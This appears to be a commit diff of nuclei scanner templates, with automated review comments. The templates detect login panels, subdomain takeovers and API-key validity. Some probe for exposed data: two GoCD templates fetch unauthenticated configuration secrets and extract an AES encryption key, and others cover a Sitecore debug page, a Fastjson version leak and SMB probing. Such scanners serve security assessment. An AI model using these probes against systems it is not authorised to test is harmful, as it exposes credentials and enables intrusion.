|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>Welcome To Kenesto®</title>'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: kerio-connect-client
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Kerio Connect Client
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Kerio Connect Client"'
|
||||||
|
tags: panel,kerio
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webmail/login/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Kerio Connect Client</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: meshcentral-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: MeshCentral - Login
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"MeshCentral - Login"'
|
||||||
|
tags: panel,meshcentral
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>MeshCentral - Login</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: pentaho-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho Panel
|
||||||
|
author: princechaddha,dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'pentaho'
|
||||||
|
tags: panel,pentaho
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/pentaho/Login'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Pentaho User Console - Login</title>'
|
|
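Review bot: This is the only panel template in the commit without `matchers-condition: and` and a `type: status` 200 matcher beside the title word (compare sitecore-login, kerio-connect-client and meshcentral-login); a lone title match is workable, but adding the status matcher keeps the panel templates uniform and avoids reporting the title when it is served on an error response.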
@ -0,0 +1,25 @@
|
||||||
|
id: shoutcast-server
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SHOUTcast Server
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"SHOUTcast Server"'
|
||||||
|
tags: panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.html"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>SHOUTcast Server</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
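Review bot: `tags: panel` carries no product tag, unlike the neighbouring panel templates (`panel,kerio`, `panel,meshcentral`, `panel,sitecore`), so this template cannot be selected by product; suggest `tags: panel,shoutcast`.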
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Login
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Welcome to Sitecore"'
|
||||||
|
tags: panel,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/sitecore/login/default.aspx'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '/sitecore/shell/Themes/Standard/Default/Login.css'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,13 +4,25 @@ info:
|
||||||
name: Apache Solr Exposure
|
name: Apache Solr Exposure
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: panel
|
tags: panel,solr
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Solr Admin"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/solr/'
|
- '{{BaseURL}}/solr/'
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<title>Solr Admin</title>"
|
- "<title>Solr Admin</title>"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'favicon\.ico\?_=([0-9.]+)'
|
||||||
|
|
|
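Review bot: The new extractor reports the numeric suffix of `favicon.ico?_=` but nothing says what that number is; if it is the Solr version the Admin UI appends to static asset URLs as a cache-buster (confirm against a live instance), add a comment above the extractor, e.g. `# Solr Admin UI appends its version to static asset URLs as a cache-buster`, and give the extractor `name: version` so the output is labelled. The `requests` block starts above the hunk, so the `{{BaseURL}}` path added here together with `stop-at-first-match: true` should be read with the untouched method/headers in mind.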
@ -0,0 +1,24 @@
|
||||||
|
id: weblogic-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Weblogic Login Panel
|
||||||
|
author: bing0o
|
||||||
|
severity: info
|
||||||
|
tags: panel,weblogic
|
||||||
|
metadata:
|
||||||
|
shodan-query: product:"Oracle Weblogic"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/console/login/LoginForm.jsp"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "WebLogic"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,8 +1,8 @@
|
||||||
id: wordpress-panel
|
id: wordpress-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Panel
|
name: WordPress login
|
||||||
author: github.com/its0x08
|
author: its0x08
|
||||||
severity: info
|
severity: info
|
||||||
tags: panel
|
tags: panel
|
||||||
|
|
||||||
|
|
|
@ -1,37 +0,0 @@
|
||||||
id: gitlab-graphql-user-enum
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Gitlab User enumeration via Graphql API
|
|
||||||
author: pikpikcu
|
|
||||||
severity: info
|
|
||||||
tags: gitlab,enum,misconfig
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: POST
|
|
||||||
path:
|
|
||||||
- "{{BaseURL}}/api/graphql"
|
|
||||||
headers:
|
|
||||||
Content-Type: application/json
|
|
||||||
body: |
|
|
||||||
{
|
|
||||||
"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- "application/json"
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
condition: and
|
|
||||||
words:
|
|
||||||
- avatarUrl
|
|
||||||
- username
|
|
||||||
- email
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
name: GitLab - User Enumeration
|
name: GitLab - User Enumeration
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
|
reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt
|
||||||
tags: gitlab,enum,misconfig
|
tags: gitlab,enum,misconfig,fuzz
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: gocd-cruise-configuration
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Cruise Configuration disclosure
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: go,gocd,config,exposure,misconfig
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/cruise_config"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "server agentAutoRegisterKey"
|
||||||
|
- "webhookSecret"
|
||||||
|
- "tokenGenerationKey"
|
||||||
|
condition: and
|
|
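Review bot: The template has no `description`, so a reader must infer from the three `and`-ed words that `/go/add-on/business-continuity/api/cruise_config` returns the server configuration including the agent auto-register key, webhook secret and token-generation key; one sentence in `info` stating that, and that the endpoint answers without authentication (which the `high` severity implies), would make the finding self-explanatory. Adding the NVD/CVE reference shared with the CVE-2021-43287 template, if this exposure is part of the same advisory, would also help triage.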
@ -0,0 +1,39 @@
|
||||||
|
id: gocd-encryption-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Encryption Key
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: low
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
||||||
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
||||||
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
||||||
|
tags: go,gocd,exposure,misconfig
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "([a-z0-9]){32}"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "([a-z0-9]){32}"
|
|
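Review bot: `severity: low` looks inconsistent with the sibling gocd-cruise-configuration template (`high`) that cites the same references, given that `cipher.aes` is presumably the key protecting the secrets in that configuration; if the rating is deliberate, a `description` should explain it, otherwise align the two. The regex `([a-z0-9]){32}` is used as both matcher and extractor and its group only ever captures the last character; `[a-z0-9]{32}` expresses the same match without implying a group is consumed. There is also a stray blank line between `matchers:` and the first `- type: status`.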
@ -0,0 +1,29 @@
|
||||||
|
id: gocd-unauth-dashboard
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GoCd Unauth Dashboard
|
||||||
|
author: dhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
|
||||||
|
tags: go,gocd,unauth,misconfig
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/go/admin/pipelines/create?group=defaultGroup'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Create a pipeline - Go</title>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -3,7 +3,7 @@ id: nginx-status
|
||||||
info:
|
info:
|
||||||
name: Nginx Status Page
|
name: Nginx Status Page
|
||||||
author: dhiyaneshDK
|
author: dhiyaneshDK
|
||||||
severity: low
|
severity: info
|
||||||
tags: misconfig,nginx
|
tags: misconfig,nginx
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-debug-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SiteCore Debug Page
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"Welcome to Sitecore"'
|
||||||
|
tags: debug,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/sitecore/'"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'extranet\Anonymous'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
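Review bot: Nothing explains why a 404 body containing `extranet\Anonymous` is a finding or why the request path deliberately ends in `'`; add a `description`, e.g. `Requesting a malformed path makes Sitecore return a verbose error page that discloses the internal site/user context (extranet\Anonymous), indicating debug error pages are enabled.` (confirm the wording against the behaviour you observed). The single-quoted `'extranet\Anonymous'` keeps the backslash literal, which is what the match needs — a comment `# single quotes: backslash is literal` would prevent a well-meant switch to double quotes. A `reference` is also missing.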
@ -0,0 +1,17 @@
|
||||||
|
id: samba-detection
|
||||||
|
info:
|
||||||
|
name: samba detection
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
tags: network,smb, samba
|
||||||
|
network:
|
||||||
|
- inputs:
|
||||||
|
- data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200
|
||||||
|
type: hex
|
||||||
|
host:
|
||||||
|
- "{{Hostname}}"
|
||||||
|
- "{{Hostname}}:139"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "SMBr"
|
|
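Review bot: The matched word `SMBr` is the generic SMBv1 Negotiate reply header (`\xffSMBr`, command 0x72) that any SMB1-capable server returns, Windows included, so the template detects SMBv1 rather than Samba and `name: samba detection` over-claims; either match on something Samba-specific in the negotiate response or rename the template to reflect what is detected. `tags: network,smb, samba` has a space after the second comma, which may survive into the tag as ` samba` depending on whether nuclei trims; write `tags: network,smb,samba`. The hex `data` blob is undocumented; a comment above it such as `# SMBv1 Negotiate Protocol request advertising the PC NETWORK PROGRAM 1.0 .. NT LM 0.12 dialects` (the dialect strings are readable in the hex) would let the next maintainer verify it.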
@ -11,7 +11,13 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<h1>Oops! We couldn’t find that page.</h1>"
|
- "<h1>Oops! We couldn’t find that page.</h1>"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"bigcartel.com")'
|
||||||
|
|
|
@ -16,11 +16,11 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- There is no helpdesk here!
|
- 'There is no helpdesk here!'
|
||||||
- Maybe this is still fresh!
|
- 'May be this is still fresh!'
|
||||||
|
- 'freshdesk.com/signup'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: dsl
|
||||||
words:
|
dsl:
|
||||||
- "freshservice.com"
|
- '!contains(host,"freshpo.com")'
|
||||||
negative: true
|
|
|
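Review bot: The hunk drops the `negative: true` word matcher on `freshservice.com` and replaces it with `'!contains(host,"freshpo.com")'`, which checks a different thing: the old matcher excluded responses whose body mentions freshservice.com, the new DSL excludes targets whose hostname is under freshpo.com. If both exclusions are wanted, keep the negative word matcher beside the DSL; if the freshservice exclusion was found unnecessary, the commit should say so. The wording change `Maybe` → `May be` presumably mirrors the live Freshdesk page text; a comment `# exact text of the Freshdesk not-found page` would stop a future grammar fix reverting it. The `requests` block begins above the hunk.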
@ -12,8 +12,13 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "There isn't a GitHub Pages site here."
|
- "There isn't a GitHub Pages site here."
|
||||||
- "For root URLs (like http://example.com/) you must provide an index.html file"
|
- "For root URLs (like http://example.com/) you must provide an index.html file"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"githubapp.com")'
|
||||||
|
|
|
@ -12,8 +12,18 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Sorry, this shop is currently unavailable."
|
|
||||||
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
||||||
|
- "Sorry, this shop is currently unavailable."
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'shop-not-found'
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"myshopify.com")'
|
|
@ -12,9 +12,14 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- Whatever you were looking for doesn't currently exist at this address.
|
- Whatever you were looking for doesn't currently exist at this address.
|
||||||
- There's nothing here.
|
- There's nothing here.
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(host,"tumblr.com")'
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: fastjson-version
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Fastjson Version Detection
|
||||||
|
author: yuansec
|
||||||
|
severity: info
|
||||||
|
description: If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76).
|
||||||
|
reference: https://blog.csdn.net/caiqiiqi/article/details/107907489
|
||||||
|
tags: fastjson,tech
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"@type":"java.lang.AutoCloseable"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'fastjson-version'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)'
|
|
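Review bot: The `description` is hard to read (`If the server returns an exception to the client,The fastjson version will be retrieved,Fastjson versions greater than 1.2.41,Contains the latest version(1.2.76).`); suggest `description: Sends a malformed JSON body so that a server using Fastjson returns a parse exception whose message includes the fastjson-version string, from which the version is extracted. The author reports this works for Fastjson versions above 1.2.41 up to and including 1.2.76.` The extractor regex `fastjson-version.*([0-9]\.[0-9]+\.[0-9]+)` uses a greedy `.*`, so if the message contains more than one version-like token it captures the last; `.*?` pins the first one after the marker. The `author: yuansec` template also lacks a `matchers-condition`, which is fine with a single matcher but differs from the rest of the commit.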
@ -0,0 +1,24 @@
|
||||||
|
id: sitecore-default-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Sitecore Default Page
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.title:"Welcome to Sitecore"
|
||||||
|
tags: tech,sitecore
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Welcome to Sitecore"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -2,16 +2,25 @@ id: weblogic-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Weblogic
|
name: Detect Weblogic
|
||||||
author: bing0o
|
author: pdteam
|
||||||
severity: info
|
severity: info
|
||||||
tags: tech,weblogic
|
tags: tech,weblogic
|
||||||
|
metadata:
|
||||||
|
shodan-query: product:"Oracle Weblogic"
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/console/login/LoginForm.jsp"
|
- "{{BaseURL}}/{{randstr}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "WebLogic"
|
- "From RFC 2068"
|
||||||
|
- "Error 404--Not Found"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
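Review bot: `author: bing0o` becomes `author: pdteam` while the request and matchers are rewritten; if the original author's credit is meant to stay, `author: bing0o,pdteam` is the form this commit already uses for shared attribution (pentaho-panel has `princechaddha,dhiyaneshDK`). The new detection relies on WebLogic's default 404 page for a random path (`From RFC 2068`, `Error 404--Not Found`, status 404); a comment such as `# WebLogic's default 404 page quotes RFC 2068; {{randstr}} guarantees a 404` above `path:` documents why a 404 is the expected status. The `info` block starts above the hunk.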
@ -4,7 +4,9 @@ info:
|
||||||
name: AbuseIPDB API Test
|
name: AbuseIPDB API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://docs.abuseipdb.com/
|
reference:
|
||||||
|
- https://docs.abuseipdb.com/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
|
||||||
tags: token-spray,abuseipdb
|
tags: token-spray,abuseipdb
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: AlienVault Open Threat Exchange (OTX) API Test
|
name: AlienVault Open Threat Exchange (OTX) API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://otx.alienvault.com/api
|
reference:
|
||||||
|
- https://otx.alienvault.com/api
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
|
||||||
tags: token-spray,alienvault
|
tags: token-spray,alienvault
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: AniAPI API Test
|
name: AniAPI API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://aniapi.com/docs/authentication
|
reference:
|
||||||
|
- https://aniapi.com/docs/authentication
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md
|
||||||
tags: token-spray,aniapi
|
tags: token-spray,aniapi
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: Cooper Hewitt API
|
name: Cooper Hewitt API
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://collection.cooperhewitt.org/api/methods/
|
reference:
|
||||||
|
- https://collection.cooperhewitt.org/api/methods/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
|
||||||
tags: token-spray,cooperhewitt
|
tags: token-spray,cooperhewitt
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-covalent
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Covalent API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://www.covalenthq.com/docs/api/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
|
||||||
|
tags: token-spray,covalent
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"address":'
|
||||||
|
- '"updated_at":'
|
||||||
|
- '"next_update_at":'
|
||||||
|
condition: and
|
|
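Review bot: The path `https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}` has a stray `&` directly after `?`, producing an empty first query parameter; write `.../balances_v2/?key={{token}}`. The three `and`-ed body words (`"address":`, `"updated_at":`, `"next_update_at":`) are the expected success fields, but the path has no wallet-address segment between `address/` and `balances_v2/`, so it is worth confirming with a valid key that the response actually contains them rather than an error object.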
@ -4,7 +4,9 @@ info:
|
||||||
name: Dribbble API Test
|
name: Dribbble API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://developer.dribbble.com/v2/
|
reference:
|
||||||
|
- https://developer.dribbble.com/v2/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
|
||||||
tags: token-spray,dribbble
|
tags: token-spray,dribbble
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: api-etherscan
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Etherscan API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference:
|
||||||
|
- https://docs.etherscan.io/
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
|
||||||
|
tags: token-spray,etherscan
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.etherscan.io/api?module=account&action=balance&address=0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae&tag=latest&apikey={{token}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
negative: true
|
||||||
|
words:
|
||||||
|
- 'Invalid API Key'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"status":'
|
||||||
|
- '"message":"OK"'
|
||||||
|
condition: and
|
|
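Review bot: The positive word matcher's first entry `'"status":'` is present in Etherscan's error envelope as well as its success envelope, so it adds nothing to the match and the real check is `'"message":"OK"'`. If the documented success response carries `"status":"1"`, writing `- '"status":"1"'` makes the first word meaningful; the negative `Invalid API Key` matcher is then redundant with the required `"message":"OK"` and could be dropped to match the simpler shape of the other token-spray templates in this commit. The hard-coded `address=` value in the path deserves a short comment saying it is a public example address used only to exercise the endpoint, so nobody tries to make it configurable.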
@ -4,7 +4,9 @@ info:
|
||||||
name: Europeana API Test
|
name: Europeana API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://pro.europeana.eu/page/search
|
reference:
|
||||||
|
- https://pro.europeana.eu/page/search
|
||||||
|
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
|
||||||
tags: token-spray,europeana
|
tags: token-spray,europeana
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
|
@ -4,7 +4,9 @@ info:
|
||||||
name: IUCN API Test
|
name: IUCN API Test
|
||||||
author: daffainfo
|
author: daffainfo
|
||||||
severity: info
|
severity: info
|
||||||
reference: http://apiv3.iucnredlist.org/api/v3/docs
|
reference:
|
||||||
|
- http://apiv3.iucnredlist.org/api/v3/docs
|
||||||
|
